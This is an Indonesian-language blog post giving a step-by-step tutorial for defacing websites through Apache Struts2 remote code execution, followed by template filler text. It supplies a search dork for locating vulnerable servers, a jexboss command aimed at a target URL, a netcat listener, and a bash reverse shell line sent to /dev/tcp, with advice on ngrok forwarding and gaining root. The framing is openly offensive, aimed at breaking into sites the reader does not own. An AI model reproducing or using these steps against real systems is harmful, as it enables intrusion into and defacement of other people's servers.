Cara Deface Dengan Apache Sruts2 ( Remote Code Execution)

yo apa kabar gaes :''v gue admin baru nih hehehe kali ini gue bakal share tutor tentang 
Apache struts2 Remote Code Execution
sedikit info tentang Remote Code Execution ini Remote Code execution adalah sebuah vulnrability yang memungkinkan si attacker untuk memberikan code code berbahaya seperti namanya Remote Code kita bisa meremote kode kode tersebut lalu mengirimnya ke web target 
yodah gk usah banyak cocot lagi :'v 
Yup Langsung saja
Bahan : 
Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
Python <- disini gaes 
jexboss <- disini gaes 
netcat <-  disini gaes 

Langsung Ke tutor

1.Buka CMD lalu ke folder jexboss nya

2.yang ke dua ketikkan 
python jexboss.py -u http://targetklean.com 
klo vuln ada bacaan vulnerable trus ketik yes


3.sekarang kita coba reverse shell
Buka Netcat nya trus ketikkan
nc -lnvp 123















habis itu ke jexbossnya yang berhasil kita exploit
4.ketikkan /bin/bash -i > /dev/tcp/ip/port 0>&1 2>&1\n
note: klo port mu blom di forward coba pakai ngrok















Klo port blom di forward cek tutor disini gaes Tutorial back conect with Ngrok (disni)

Done udah kita berhasil reverse shell tinggal di anuin

Vidionya Gaes : disini gaes 

klo hoki sih bisa di root :''v
Axact

Axact

Vestibulum bibendum felis sit amet dolor auctor molestie. In dignissim eget nibh id dapibus. Fusce et suscipit orci. Aliquam sit amet urna lorem. Duis eu imperdiet nunc, non imperdiet libero.

Post A Comment:

0 comments: